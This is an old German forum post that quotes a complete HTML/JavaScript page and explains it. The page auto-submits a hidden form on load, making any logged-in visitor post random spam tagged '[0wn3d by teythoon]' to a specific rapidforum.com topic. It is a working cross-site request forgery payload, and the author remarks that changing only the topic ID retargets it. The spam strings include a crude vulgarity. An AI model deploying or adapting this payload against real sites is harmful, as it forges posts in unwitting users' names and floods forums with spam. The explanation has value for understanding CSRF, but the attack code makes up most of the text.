TeyThoon's komische JavaScript-Pwnage
2006-04-25 22:01
Wolf
Wie genau funktioniert das und was sind die Konsequenzen?Hier ist nochmal der Code:
(Wenn jemand antworten will, so moege er ein neues Topic aufmachen ;)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>suessss!</title>
<script type="application/x-javascript">
var subject = new Array("", "coole seite", "echt interessant",
"muss man gesehen haben", "wow", "genial", "crass", "das ist echt mal was anderes",
"der hammer", "juhuhuhu", "schlumpf", "cooool", "boah", "crass alter",
"fooooooo", "strange", "ich krich titten", "mann alter ey");
[b]function go()
{[/b]
document.eingabe.posting_subtitle.value = generateSomeStupidText();
document.eingabe.body.value = generateSomeStupidText() + "\n\n[0wn3d by teythoon]";
[b]document.eingabe.submit();[/b]
[b]}[/b]
function generateSomeStupidText()
{
var useTehForceLuke = Math.floor(Math.random() * subject.length);
var a = Math.floor(Math.random() * subject.length);
var b = Math.floor(Math.random() * subject.length);
var c = Math.floor(Math.random() * subject.length);
r = subject[useTehForceLuke];
for (var i = 0; i < a; i++) r += "!";
for (var i = 0; i < b; i++) r += "1";
for (var i = 0; i < c; i++) r += "elf";
return r;
}
</script>
</head>
[b]<body onload="go()" style="background: black;">
<form name="eingabe" action="http://3773.rapidforum.com/" method="post" />[/b]
<input type="hidden" name="area" value="007" />
<input type="hidden" name="topic" value="100775393607" />
<input type="hidden" name="action" value="newposting" />
<input type="hidden" name="dummy" value="topic=100775393607&gotofirstnewposting=1#unten" id="override" />
<input type="hidden" name="text" value="" />
<input type="hidden" name="macher" value="" />
<input type="hidden" name="zeit" value="" />
<input type="hidden" name="posting_subtitle" value="" size="55" maxlength="50" tabindex="1" />
<input type="hidden" name="icon" value="123" checked />
<input type="hidden" name="body" value="" />
<input type="hidden" value="mehr" name="getmore" />
<input type="hidden" value="Fullquote" />
<input type="hidden" value="Shortquote" />
<input type="hidden" name="killeasyhtml" />
<input type="hidden" name="killreplacer" />
<input type="hidden" accesskey="S" value="neuen Beitrag erstellen" name="savenewposting" />
<!--<input type="hidden" value="Vorschau" name="inlinepreview" />-->
</form>
<center><img src="fish.jpg" alt="" /></center>
</body>
</html>
Das Einzige, was die Seite macht, ist in genau dem Topic nochmal zu posten, indem sie ein HTTP-POST abschickt, das der gewünschten Form entspricht. Wenn man eingeloggt ist und auf den Link klickt, dann ist man auch als Urheber eines solchen "Owned"-Posts zu erkennen, da man ja den Cookie hat. Das ist alles.Edit: Nervig ist, dass man nur die Topic-ID abändern muss, damit man damit andere Topics vollspammen kann.